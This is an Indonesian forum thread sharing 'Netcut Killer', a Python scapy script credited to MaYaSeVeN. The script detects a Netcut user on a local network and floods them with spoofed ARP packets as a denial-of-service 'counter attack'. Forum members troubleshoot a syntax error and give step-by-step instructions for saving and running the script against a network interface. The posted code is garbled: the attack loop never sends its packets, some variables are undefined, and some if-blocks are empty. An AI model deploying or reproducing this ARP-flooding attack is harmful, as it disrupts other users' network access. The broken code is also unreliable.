[Share] Netcut Killer !
om,ini kalo buat windows bisa gak ?

kok gak bisa ya Sad

root@bt:~/APP# python netcatkiller.py
  File "netcatkiller.py", line 3
    Title: Netcut Denial of Service Vulnerability
SyntaxError: invalid syntax

(12-04-2012, 06:35 PM)amanojaku Wrote: kok gak bisa ya Sad

root@bt:~/APP# python netcatkiller.py
  File "netcatkiller.py", line 3
    Title: Netcut Denial of Service Vulnerability
SyntaxError: invalid syntax

Copy Paste ulang om scripnya ...
Kalo gak, edit script nya, tambahin "#" sebelum Title ...
Contoh : #Title: Netcut Denial of Service Vulnerability

note :
File "netcatkiller.py", line 3
itu maksdunya ada command / perintah yang tidak diketahui, di baris 3 > file netcatkiller.py

klo di combo ma arpon kaya nya sangar nih..

kayaknya mantap bener nih tools \m/
ijin nyoba om :d :-bd :-bd
I am Just Lammer Sakit Hati

(12-04-2012, 06:35 PM)amanojaku Wrote: kok gak bisa ya Sad

root@bt:~/APP# python netcatkiller.py
  File "netcatkiller.py", line 3
    Title: Netcut Denial of Service Vulnerability
SyntaxError: invalid syntax

kalo ga bisa coba ambil netcut killer dari tools ane di CAST bro Big Grin search di pemrograman bash di forum ini

save scriptnya.


lalu, chmod filenya.

chmod +x netcut.py

Setelah selesai chmod, jalankan

python netcut.py wlan0

ni perbaikan dr penjelasan mas THTJ
** wlan0 diganti dengan interface yg mau dipakai kalo dr LAN gunakan eth0
pasti jalan...Wink

biar lbh gampang dimengerti saya buat urutannya dr komentar2 tman diatas...

ketik dr terminal backtrack
gedit netcutkiller.py
atau pada terminal Kali
leafpad netcutkiller.py

lalu copi paste kode dibawah ini :

#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
#PoC: Video  /user/mayaseven
#Picture /-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: /?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip  = commands.getoutput("ip route list | grep default").split()[2]
def protect(gw_ip,gw_mac):
        os.popen("arp -s %s %s" %(gw_ip,gw_mac))
        print "Protected himself"
def detect():
                ans = sniff(filter='arp',timeout=7)
                for r in ans.res:
                        target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
                return target

def preattack(gw_ip):
        num = []
        count = 0
        target = 0
        temp = 0
        print "Detecting..."
        d = detect()
        for i in range(len(d)):
                if d[i].split()[0] == "":
                        if d.count(d[i]) > count:
                                count = d.count(d[i])
                                target = i
                if d[i].split()[0] == gw_ip:
                        temp += 1        
        if len(d) < 7:
                print "[-] No one use Netcut or try again"
        if len(num)*7 < temp:
                num[:] = []
                count = 0
                result = float(temp)/len(d)*100
                for j in range(len(d)):
                        if d[i].split()[0] == gw_ip:
                                if d.count(d[i]) > count:
                                        count = d.count(d[i])
                                        target = i
                        result = float(temp)/len(d)*100
                print target
                result = float(num[0]+temp)/len(d)*100
        print "There is a possibility that " + str(result) + "%"
        if result>= 50:
                target_mac = d[target].split()[1]
                target_ip = d[target].split()[2]
                print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
                print "[-] No one use Netcut or try again"

def attack(target_mac,target_ip,gw_ip):
        print "[+]Counter Attack !!!"
        e = Ether(dst="FF:FF:FF:FF:FF:FF")
        while 1:
                a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
                p = e/a/Padding("\x00"*18)
                a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
                p1 = e/a1/Padding("\x00"*18)
if __name__ == '__main__':
        print   "###################################################"
        print   " __  __        __       __     _____   __        __  _   _"
        print   "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
        print   "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
        print   "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
        print   "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
        print   "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
        print   " "
        print   "###################################################"
        print   ""
        print   ""
        print   ""
        if len(sys.argv) == 2 or len(sys.argv) == 3:
                if len(sys.argv) == 2:
                if len(sys.argv) == 3:
                        gw_mac = sys.argv[2]
                print '''Mode:  
1.)Attack only
Usage: NetcutKiller <Interface>
e.g. NetcutKiller.py wlan0
2.)Attack with protect himself
Usage: NetcutKiller <Interface> <MAC_Gateway>
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
lalu simpan dan tutup

lalu, chmod filenya.

chmod +x netcutkiller.py

Setelah selesai chmod, jalankan

python netcutkiller.py wlan0

ni perbaikan dr penjelasan mas THTJ
** wlan0 diganti dengan interface yg mau dipakai kalo dr LAN gunakan eth0
pasti jalan...Wink

mudah2an ada yg warna hijau di kantungan plastik saya...:d

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